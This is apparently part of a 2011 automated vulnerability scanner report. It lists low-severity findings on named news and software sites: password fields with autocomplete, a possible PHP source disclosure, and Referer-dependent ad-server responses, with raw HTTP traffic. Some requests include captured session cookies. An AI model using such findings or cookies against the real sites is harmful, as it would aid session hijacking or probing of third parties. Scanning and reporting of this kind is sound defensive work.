12.145. http://www.bostonherald.com/jobfind/news/technology/view/20110128study_morecos_usingfacebooktwitter_formarketing/format=comments&srvc=home&position=also previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.bostonherald.com
Path:	/jobfind/news/technology/view/20110128study_morecos_usingfacebooktwitter_formarketing/format=comments&srvc=home&position=also

Issue detail

The page contains a form with the following action URL:

http://www.bostonherald.com/jobfind/news/technology/view/20110128study_morecos_usingfacebooktwitter_formarketing/format=comments&srvc=home&position=also

The form contains the following password fields with autocomplete enabled:

password
confirm_password

Request

Response

12.146. http://www.bostonherald.com/news/national/general/view/20110128remembering_the_challengers_haunting_explosion/format=comments&srvc=home&position=5 previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.bostonherald.com
Path:	/news/national/general/view/20110128remembering_the_challengers_haunting_explosion/format=comments&srvc=home&position=5

Issue detail

The page contains a form with the following action URL:

http://www.bostonherald.com/news/national/general/view/20110128remembering_the_challengers_haunting_explosion/format=comments&srvc=home&position=5

The form contains the following password fields with autocomplete enabled:

password
confirm_password

Request

Response

12.147. http://www.bostonherald.com/news/politics/view/20110128mitt_romney_catches_up_with_boston_gop_pols/format=comments&srvc=home&position=1 previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.bostonherald.com
Path:	/news/politics/view/20110128mitt_romney_catches_up_with_boston_gop_pols/format=comments&srvc=home&position=1

Issue detail

The page contains a form with the following action URL:

http://www.bostonherald.com/news/politics/view/20110128mitt_romney_catches_up_with_boston_gop_pols/format=comments&srvc=home&position=1

The form contains the following password fields with autocomplete enabled:

password
confirm_password

Request

Response

12.148. http://www.bostonherald.com/news/politics/view/20110128speaker_deleo_shakes_up_house/format=comments&srvc=home&position=0 previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.bostonherald.com
Path:	/news/politics/view/20110128speaker_deleo_shakes_up_house/format=comments&srvc=home&position=0

Issue detail

The page contains a form with the following action URL:

http://www.bostonherald.com/news/politics/view/20110128speaker_deleo_shakes_up_house/format=comments&srvc=home&position=0

The form contains the following password fields with autocomplete enabled:

password
confirm_password

Request

Response

12.149. http://www.bostonherald.com/news/regional/view.bg previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.bostonherald.com
Path:	/news/regional/view.bg

Issue detail

The page contains a form with the following action URL:

http://www.bostonherald.com/news/regional/view.bg?articleid=1312541&format=comments&srvc=home&position=active

The form contains the following password fields with autocomplete enabled:

password
confirm_password

Request

Response

12.150. http://www.bostonherald.com/news/regional/view/20110128another_winter_wallop_batters_boston/format=comments&srvc=home&position=also previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.bostonherald.com
Path:	/news/regional/view/20110128another_winter_wallop_batters_boston/format=comments&srvc=home&position=also

Issue detail

The page contains a form with the following action URL:

http://www.bostonherald.com/news/regional/view/20110128another_winter_wallop_batters_boston/format=comments&srvc=home&position=also

The form contains the following password fields with autocomplete enabled:

password
confirm_password

Request

Response

12.151. http://www.bostonherald.com/news/regional/view/20110128feds_fake_cop_cammed_dates_alleged_thief_scored_women_as_us_marshal_on_craigslist/format=comments&srvc=home&position=4 previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.bostonherald.com
Path:	/news/regional/view/20110128feds_fake_cop_cammed_dates_alleged_thief_scored_women_as_us_marshal_on_craigslist/format=comments&srvc=home&position=4

Issue detail

The page contains a form with the following action URL:

http://www.bostonherald.com/news/regional/view/20110128feds_fake_cop_cammed_dates_alleged_thief_scored_women_as_us_marshal_on_craigslist/format=comments&srvc=home&position=4

The form contains the following password fields with autocomplete enabled:

password
confirm_password

Request

Response

12.152. http://www.bostonherald.com/sports/basketball/celtics/view/20110128shaq_feels_needle_again_shot-up_center_plans_to_play_tonight/format=comments&srvc=home&position=also previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.bostonherald.com
Path:	/sports/basketball/celtics/view/20110128shaq_feels_needle_again_shot-up_center_plans_to_play_tonight/format=comments&srvc=home&position=also

Issue detail

The page contains a form with the following action URL:

http://www.bostonherald.com/sports/basketball/celtics/view/20110128shaq_feels_needle_again_shot-up_center_plans_to_play_tonight/format=comments&srvc=home&position=also

The form contains the following password fields with autocomplete enabled:

password
confirm_password

Request

Response

12.153. http://www.bostonherald.com/sports/football/patriots/view/20110128confidence_on_rebound_meriweather_wont_be_bothered_by_naysayers/format=comments&srvc=home&position=7 previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.bostonherald.com
Path:	/sports/football/patriots/view/20110128confidence_on_rebound_meriweather_wont_be_bothered_by_naysayers/format=comments&srvc=home&position=7

Issue detail

The page contains a form with the following action URL:

http://www.bostonherald.com/sports/football/patriots/view/20110128confidence_on_rebound_meriweather_wont_be_bothered_by_naysayers/format=comments&srvc=home&position=7

The form contains the following password fields with autocomplete enabled:

password
confirm_password

Request

Response

12.154. http://www.bostonherald.com/track/celebrity/view/20110127actor_charlie_sheen_hospitalized_publicist_says/format=comments&srvc=track&position=also previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.bostonherald.com
Path:	/track/celebrity/view/20110127actor_charlie_sheen_hospitalized_publicist_says/format=comments&srvc=track&position=also

Issue detail

The page contains a form with the following action URL:

http://www.bostonherald.com/track/celebrity/view/20110127actor_charlie_sheen_hospitalized_publicist_says/format=comments&srvc=track&position=also

The form contains the following password fields with autocomplete enabled:

password
confirm_password

Request

Response

12.155. http://www.bostonherald.com/track/inside_track/view/20110127boy_banders_faithful_to_fenway/format=comments&srvc=track&position=also previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.bostonherald.com
Path:	/track/inside_track/view/20110127boy_banders_faithful_to_fenway/format=comments&srvc=track&position=also

Issue detail

The page contains a form with the following action URL:

http://www.bostonherald.com/track/inside_track/view/20110127boy_banders_faithful_to_fenway/format=comments&srvc=track&position=also

The form contains the following password fields with autocomplete enabled:

password
confirm_password

Request

Response

12.156. http://www.bostonherald.com/track/inside_track/view/20110128hernia_sends_hearty_partier_sheen_to_the_hospital/format=comments&srvc=home&position=also previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.bostonherald.com
Path:	/track/inside_track/view/20110128hernia_sends_hearty_partier_sheen_to_the_hospital/format=comments&srvc=home&position=also

Issue detail

The page contains a form with the following action URL:

http://www.bostonherald.com/track/inside_track/view/20110128hernia_sends_hearty_partier_sheen_to_the_hospital/format=comments&srvc=home&position=also

The form contains the following password fields with autocomplete enabled:

password
confirm_password

Request

Response

12.157. http://www.bostonherald.com/track/inside_track/view/20110128hernia_sends_hearty_partier_sheen_to_the_hospital/format=comments&srvc=track&position=also previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.bostonherald.com
Path:	/track/inside_track/view/20110128hernia_sends_hearty_partier_sheen_to_the_hospital/format=comments&srvc=track&position=also

Issue detail

The page contains a form with the following action URL:

http://www.bostonherald.com/track/inside_track/view/20110128hernia_sends_hearty_partier_sheen_to_the_hospital/format=comments&srvc=track&position=also

The form contains the following password fields with autocomplete enabled:

password
confirm_password

Request

Response

12.158. http://www.bostonherald.com/track/inside_track/view/20110128moores_the_merrier_at_hasty_festivities/format=comments&srvc=home&position=3 previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.bostonherald.com
Path:	/track/inside_track/view/20110128moores_the_merrier_at_hasty_festivities/format=comments&srvc=home&position=3

Issue detail

The page contains a form with the following action URL:

http://www.bostonherald.com/track/inside_track/view/20110128moores_the_merrier_at_hasty_festivities/format=comments&srvc=home&position=3

The form contains the following password fields with autocomplete enabled:

password
confirm_password

Request

Response

12.159. http://www.bostonherald.com/users/register previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.bostonherald.com
Path:	/users/register

Issue detail

The page contains a form with the following action URL:

http://www.bostonherald.com/users/register/

The form contains the following password fields with autocomplete enabled:

password
confirm_password

Request

Response

12.160. http://www.bostonherald.com/users/register/ previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.bostonherald.com
Path:	/users/register/

Issue detail

The page contains a form with the following action URL:

http://www.bostonherald.com/users/register/

The form contains the following password fields with autocomplete enabled:

password
confirm_password

Request

Response

12.161. http://www.paperg.com/ previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.paperg.com
Path:	/

Issue detail

The page contains a form with the following action URL:

http://www.paperg.com/

The form contains the following password field with autocomplete enabled:

pass

Request

GET / HTTP/1.1
Host: www.paperg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=7vd5ghvii8jml9e7v9p6kn1gt1;

Response

12.162. https://www.paperg.com/post.php previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://www.paperg.com
Path:	/post.php

Issue detail

The page contains a form with the following action URL:

https://www.paperg.com/login.php

The form contains the following password field with autocomplete enabled:

pass

Request

GET /post.php?bid=2123&pid=3922&post HTTP/1.1
Host: www.paperg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=7vd5ghvii8jml9e7v9p6kn1gt1;

Response

12.163. https://www.paperg.com/post.php previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://www.paperg.com
Path:	/post.php

Issue detail

The page contains a form with the following action URL:

https://www.paperg.com/process.php

The form contains the following password fields with autocomplete enabled:

login_password
account_password
account_confirm_password

Request

Response

HTTP/1.0 200 OK
Date: Fri, 28 Jan 2011 17:17:46 GMT
Server: Apache
X-Powered-By: PHP/5.2.17
P3P: CP="CAO PSA OUR"
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en">
   <head>
       <title>PaperG | Post a Flyer</title>

       <meta http-equiv="Content-Type" co
...[SNIP]...
</script>


                                                                           <form name="campaign_form" enctype="multipart/form-data" action="process.php" method="POST" onsubmit="onFormSubmit();">
                   <input type="hidden" name="owner_id" value="0">
...[SNIP]...
<td>
                               <input type="password" name="login_password" id="login_password" onkeydown="on_login_enter(event);" onchange="saveInput(this.getAttribute( 'name' ));"/>
                               <span id="msg_login_password">
...[SNIP]...
<td>
                               <input maxlength=30 name="account_password" type="password" onchange="saveInput(this.getAttribute( 'name' ));" />
                               <br />
...[SNIP]...
<td>
                               <input maxlength=30 name="account_confirm_password" type="password" />
                               <span id="msg_account_confirm_password">
...[SNIP]...

12.164. http://www.parker-software.com/forum/ previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.parker-software.com
Path:	/forum/

Issue detail

The page contains a form with the following action URL:

http://www.parker-software.com/forum/login_user.asp

The form contains the following password field with autocomplete enabled:

password

Request

GET /forum/ HTTP/1.1
Host: www.parker-software.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

12.165. http://www.parkersoft.co.uk/client.aspx previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.parkersoft.co.uk
Path:	/client.aspx

Issue detail

The page contains a form with the following action URL:

http://www.parkersoft.co.uk/client.aspx

The form contains the following password field with autocomplete enabled:

ctl00$ContentMain$txtPassword

Request

Response

12.166. http://www.screenthumbs.com/ previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.screenthumbs.com
Path:	/

Issue detail

The page contains a form with the following action URL:

http://www.screenthumbs.com/login

The form contains the following password field with autocomplete enabled:

password

Request

Response

12.167. http://www.screenthumbs.com/about previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.screenthumbs.com
Path:	/about

Issue detail

The page contains a form with the following action URL:

http://www.screenthumbs.com/login

The form contains the following password field with autocomplete enabled:

password

Request

Response

12.168. http://www.screenthumbs.com/contact previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.screenthumbs.com
Path:	/contact

Issue detail

The page contains a form with the following action URL:

http://www.screenthumbs.com/login

The form contains the following password field with autocomplete enabled:

password

Request

Response

12.169. http://www.screenthumbs.com/forgot previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.screenthumbs.com
Path:	/forgot

Issue detail

The page contains a form with the following action URL:

http://www.screenthumbs.com/login

The form contains the following password field with autocomplete enabled:

password

Request

Response

12.170. http://www.screenthumbs.com/linkthumbs previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.screenthumbs.com
Path:	/linkthumbs

Issue detail

The page contains a form with the following action URL:

http://www.screenthumbs.com/login

The form contains the following password field with autocomplete enabled:

password

Request

Response

12.171. http://www.screenthumbs.com/plugins previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.screenthumbs.com
Path:	/plugins

Issue detail

The page contains a form with the following action URL:

http://www.screenthumbs.com/login

The form contains the following password field with autocomplete enabled:

password

Request

Response

12.172. http://www.screenthumbs.com/service previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.screenthumbs.com
Path:	/service

Issue detail

The page contains a form with the following action URL:

http://www.screenthumbs.com/login

The form contains the following password field with autocomplete enabled:

password

Request

Response

12.173. http://www.screenthumbs.com/signup previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.screenthumbs.com
Path:	/signup

Issue detail

The page contains a form with the following action URL:

http://www.screenthumbs.com/signup.php

The form contains the following password fields with autocomplete enabled:

password
password2

Request

Response

12.174. http://www.screenthumbs.com/signup.php previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.screenthumbs.com
Path:	/signup.php

Issue detail

The page contains a form with the following action URL:

http://www.screenthumbs.com/signup.php

The form contains the following password fields with autocomplete enabled:

password
password2

Request

Response

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.stylemepretty.com
Path:	/\|http:/stylehive.com\|http:/stylelist.com\|http:/www.outblush.com/\|http:/www.dooce.com/\|http:/www.mightygoods.com/\|http:/www.coolmompicks.com\|onemanga.com\|psychcentral.com\|webmail.aol.com\|http:/www.weblogsinc.com\|http:/www.webmd.com/$\|wonderwall.msn.com\|msn.com/wonderwall\|v14.msn.com/\|preview.msn.com/\|www.msn.com/preview.aspx\|mtv.com/videos/\|mtv.com/

Issue detail

The page contains a form with the following action URL:

http://circle.stylemepretty.com/wp-login.php

The form contains the following password field with autocomplete enabled:

Request

Response

13. Source code disclosure previous next

Summary

Severity:	Low
Confidence:	Tentative
Host:	http://www.addthis.com
Path:	/bookmark.php

Issue detail

The application appears to disclose some server-side source code written in PHP.

Issue background

Server-side source code may contain sensitive information which can help an attacker formulate attacks against the application.

Issue remediation

Server-side source code is normally disclosed to clients as a result of typographical errors in scripts or because of misconfiguration, such as failing to grant executable permissions to a script or directory. You should review the cause of the code disclosure and prevent it from happening.

Request

GET /bookmark.php HTTP/1.1
Host: www.addthis.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

14. Referer-dependent response previous next
There are 6 instances of this issue:

http://ad.doubleclick.net.57389.9231.302br.net/jsi/adi/N4682.132309.BURSTMEDIA/B4421704.7
http://b3.mookie1.com/3/AOLB3/RadioShack/SELL_2011Q1/CPA/728/18503855336@x90
http://c.brightcove.com/services/viewer/federated_f9
http://onset.freedom.com/fi/analytics/cms/
http://twitter.com/malsup
http://www.screenthumbs.com/tools/js/linkthumbs.js

Issue description

The application's responses appear to depend systematically on the presence or absence of the Referer header in requests. This behaviour does not necessarily constitute a security vulnerability, and you should investigate the nature of and reason for the differential responses to determine whether a vulnerability is present.

Common explanations for Referer-dependent responses include:

Referer-based access controls, where the application assumes that if you have arrived from one privileged location then you are authorised to access another privileged location. These controls can be trivially defeated by supplying an accepted Referer header in requests for the vulnerable function.
Attempts to prevent cross-site request forgery attacks by verifying that requests to perform privileged actions originated from within the application itself and not from some external location. Such defenses are not robust - methods have existed through which an attacker can forge or mask the Referer header contained within a target user's requests, by leveraging client-side technologies such as Flash and other techniques.
Delivery of Referer-tailored content, such as welcome messages to visitors from specific domains, search-engine optimisation (SEO) techniques, and other ways of tailoring the user's experience. Such behaviours often have no security impact; however, unsafe processing of the Referer header may introduce vulnerabilities such as SQL injection and cross-site scripting. If parts of the document (such as META keywords) are updated based on search engine queries contained in the Referer header, then the application may be vulnerable to persistent code injection attacks, in which search terms are manipulated to cause malicious content to appear in responses served to other application users.

Issue remediation

The Referer header is not a robust foundation on which to build any security measures, such as access controls or defenses against cross-site request forgery. Any such measures should be replaced with more secure alternatives that are not vulnerable to Referer spoofing.

If the contents of responses is updated based on Referer data, then the same defenses against malicious input should be employed here as for any other kinds of user-supplied data.

14.1. http://ad.doubleclick.net.57389.9231.302br.net/jsi/adi/N4682.132309.BURSTMEDIA/B4421704.7 previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://ad.doubleclick.net.57389.9231.302br.net
Path:	/jsi/adi/N4682.132309.BURSTMEDIA/B4421704.7

Request 1

GET /jsi/adi/N4682.132309.BURSTMEDIA/B4421704.7;sz=300x250;click=http://www.burstnet.com/ads/ad19083a-map.cgi/BCPG174597.252798.300824/VTS=29iU7.jjkA/SZ=300X250A/V=2.3S//REDIRURL=;ord=3925? HTTP/1.1
Host: ad.doubleclick.net.57389.9231.302br.net
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Middle1&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 1

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=2667D6E67A1B439BD1357045C7EEE079; Path=/
Content-Type: text/html
Content-Length: 7169
Date: Sat, 29 Jan 2011 01:55:05 GMT
Connection: close

<html>
<head></head>
<body>
<script type="text/javascript"><!--

var adsafeVisParams = {
   mode : "jsi",
   jsref : "http://www.bostonherald.com/includes/processAds.bg?position=Middle1&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome",
   adsafeSrc : "http://ad.doubleclick.net.57389.9231.302br.net/fw/adi/N4682.132309.BURSTMEDIA/B4421704.7;sz=300x250;click=http://www.burstnet.com/ads/ad19083a-map.cgi/BCPG174597.252798.300824/VTS=29iU7.jjkA/SZ=300X250A/V=2.3S//REDIRURL=;ord=3925",
   adsafeSep : "?",
   requrl : "",
   reqquery : "",
   debug : "false"
};

// use closure to keep out of global namespace
(function() {

   /* ============================ UTILITIES (LOGGING) ============================ */

   var version = "v260 - after fire drill release";
   var debug = (adsafeVisParams.debug == "true");

   var logLevels = {
       INFO : 'info',
       LOG : 'log',
       DIR : 'dir'
   };

   var log = function(obj, level){
       if (typeof level == 'undefined') level = logLevels.INFO;
       if (debug && (typeof console != 'undefined') && (typeof console.info != 'undefined') && (typeof console.log != 'undefined') && (typeof console.dir != 'undefined')) {
           try {
               console[level](obj);
           } catch (e) {
           }
       }
   };

   var logDetection = function(resultArr, testTypes) {
       if (debug && (typeof console != 'undefined') && (typeof console.info != 'undefined') && (typeof console.log != 'undefined') && (typeof console.dir != 'undefined')) {
           console.info('Server Parameters:');
           console.dir(adsafeVisParams);
           var str = 'Detection Results:\n\n';
           for (var i in resultArr) {
               var row = resultArr[i];
               str += row.key + ': ' + decodeURIComponent(row.val) + '\n';
           }
           console.info(str);
           str = 'key: \n';
           for (var prop in testTypes) {
               if (testTypes.hasOwnProperty(prop)) {
                   str += prop + ': ' + testTypes[prop] + '\n';
               }
           }
           console.log(str);
       }
   };

   log(version + ', mode: ' + adsafeVisParams.mode);

   /* ============================ DETECTION ============================ */

   /*
    * note: this is just here for reference
    */
   var testTypes = {
       a : 'top.locati
...[SNIP]...

Request 2

GET /jsi/adi/N4682.132309.BURSTMEDIA/B4421704.7;sz=300x250;click=http://www.burstnet.com/ads/ad19083a-map.cgi/BCPG174597.252798.300824/VTS=29iU7.jjkA/SZ=300X250A/V=2.3S//REDIRURL=;ord=3925? HTTP/1.1
Host: ad.doubleclick.net.57389.9231.302br.net
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 2

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=75DDBEB9BA368438C43D431B363642FD; Path=/
Content-Type: text/html
Content-Length: 7025
Date: Sat, 29 Jan 2011 01:55:05 GMT
Connection: close

<html>
<head></head>
<body>
<script type="text/javascript"><!--

var adsafeVisParams = {
   mode : "jsi",
   jsref : "null",
   adsafeSrc : "http://ad.doubleclick.net.57389.9231.302br.net/fw/adi/N4682.132309.BURSTMEDIA/B4421704.7;sz=300x250;click=http://www.burstnet.com/ads/ad19083a-map.cgi/BCPG174597.252798.300824/VTS=29iU7.jjkA/SZ=300X250A/V=2.3S//REDIRURL=;ord=3925",
   adsafeSep : "?",
   requrl : "",
   reqquery : "",
   debug : "false"
};

// use closure to keep out of global namespace
(function() {

   /* ============================ UTILITIES (LOGGING) ============================ */

   var version = "v260 - after fire drill release";
   var debug = (adsafeVisParams.debug == "true");

   var logLevels = {
       INFO : 'info',
       LOG : 'log',
       DIR : 'dir'
   };

   var log = function(obj, level){
       if (typeof level == 'undefined') level = logLevels.INFO;
       if (debug && (typeof console != 'undefined') && (typeof console.info != 'undefined') && (typeof console.log != 'undefined') && (typeof console.dir != 'undefined')) {
           try {
               console[level](obj);
           } catch (e) {
           }
       }
   };

   var logDetection = function(resultArr, testTypes) {
       if (debug && (typeof console != 'undefined') && (typeof console.info != 'undefined') && (typeof console.log != 'undefined') && (typeof console.dir != 'undefined')) {
           console.info('Server Parameters:');
           console.dir(adsafeVisParams);
           var str = 'Detection Results:\n\n';
           for (var i in resultArr) {
               var row = resultArr[i];
               str += row.key + ': ' + decodeURIComponent(row.val) + '\n';
           }
           console.info(str);
           str = 'key: \n';
           for (var prop in testTypes) {
               if (testTypes.hasOwnProperty(prop)) {
                   str += prop + ': ' + testTypes[prop] + '\n';
               }
           }
           console.log(str);
       }
   };

   log(version + ', mode: ' + adsafeVisParams.mode);

   /* ============================ DETECTION ============================ */

   /*
    * note: this is just here for reference
    */
   var testTypes = {
       a : 'top.location.href',
       b : 'parent.location.href',
       c : 'parent.document.referrer',
       d : 'window.location.href',
       e : 'window.document.referrer',
       f :
...[SNIP]...

14.2. http://b3.mookie1.com/3/AOLB3/RadioShack/SELL_2011Q1/CPA/728/18503855336@x90 previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://b3.mookie1.com
Path:	/3/AOLB3/RadioShack/SELL_2011Q1/CPA/728/18503855336@x90

Request 1

GET /3/AOLB3/RadioShack/SELL_2011Q1/CPA/728/18503855336@x90?http://r1-ads.ace.advertising.com/click/site=0000766161/mnum=0000950192/cstr=95030253=_4d435bd9,8503855336,766161^950192^1183^0,1_/xsxdata=$XSXDATA/bnum=95030253/optn=64?trg= HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Bottom&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; id=914803576615380; dlx_7d=set; Dominos=DataXuB3; RMFL=011Pi745U102Og|U106t6; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj; other_20110126=set; dlx_XXX=set; dlx_20100929=set; ATTWL=CollectiveB3; NSC_o4efm_qppm_iuuq=ffffffff09499e6e45525d5f4f58455e445a4a423660; session=1296256112|1296259812

Response 1

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 01:57:02 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 3174
Content-Type: application/x-javascript

document.write ('<IFRAME SRC="http://ad.doubleclick.net/adi/N3867.270604.B3/B5128597.7;sz=728x90;click0=http://r1-ads.ace.advertising.com/click/site=0000766161/mnum=0000950192/cstr=95030253=_4d435bd9,8503855336,766161_950192_1183_0,1_/xsxdata=$XSXDATA/bnum=95030253/optn=64?trg=http://b3.mookie1.com/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/728/L36/78176531/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?;ord=78176531?" WIDTH=728 HEIGHT=90 MARGINWIDTH=0 MARGINHEIGHT=0 HSPACE=0 VSPACE=0 FRAMEBORDER=0 SCROLLING=no BORDERCOLOR=');
document.write ("'");
document.write ('#000000');
document.write ("'");
document.write ('>\n');
document.write ('<SCRIPT language=');
document.write ("'");
document.write ('JavaScript1.1');
document.write ("'");
document.write (' SRC="http://ad.doubleclick.net/adj/N3867.270604.B3/B5128597.7;abr=!ie;sz=728x90;click0=http://r1-ads.ace.advertising.com/click/site=0000766161/mnum=0000950192/cstr=95030253=_4d435bd9,8503855336,766161_950192_1183_0,1_/xsxdata=$XSXDATA/bnum=95030253/optn=64?trg=http://b3.mookie1.com/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/728/L36/78176531/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?;ord=78176531?">\n');
document.write ('</SCRIPT>\n');
document.write ('<NOSCRIPT>\n');
document.write ('<A HREF="http://r1-ads.ace.advertising.com/click/site=0000766161/mnum=0000950192/cstr=95030253=_4d435bd9,8503855336,766161_950192_1183_0,1_/xsxdata=$XSXDATA/bnum=95030253/optn=64?trg=http://b3.mookie1.com/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/728/L36/78176531/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?http://ad.doubleclick.net/jump/N3867.270604.B3/B5128597.7;abr=!ie4;abr=!ie5;sz=728x90;ord=78176531?">\n');
document.write ('<IMG SRC="http://ad.doubleclick.net/ad/N3867.270604.B3/B5128597.7;abr=!ie4;abr=!ie5;sz=728x90;ord=78176531?" BORDER=0 WIDTH=728 HEIGHT=90 ALT="Advertisement"></A>\n');
document.write ('</NOSCRIPT>\n');
document.write ('</IFRAME>\n');
document.write ('<SCRIPT TYPE="text/javascript" language="JavaScript">\n');
document.write ('var B3d=new Date();\n');
document.write ('var B3m=B3d.getTime();\n');
document.write ('B3d.setTime(B3m+30*24*60*60*1000);\n');
docum
...[SNIP]...

Request 2

GET /3/AOLB3/RadioShack/SELL_2011Q1/CPA/728/18503855336@x90?http://r1-ads.ace.advertising.com/click/site=0000766161/mnum=0000950192/cstr=95030253=_4d435bd9,8503855336,766161^950192^1183^0,1_/xsxdata=$XSXDATA/bnum=95030253/optn=64?trg= HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; id=914803576615380; dlx_7d=set; Dominos=DataXuB3; RMFL=011Pi745U102Og|U106t6; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj; other_20110126=set; dlx_XXX=set; dlx_20100929=set; ATTWL=CollectiveB3; NSC_o4efm_qppm_iuuq=ffffffff09499e6e45525d5f4f58455e445a4a423660; session=1296256112|1296259812

Response 2

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 01:57:56 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 3192
Content-Type: application/x-javascript

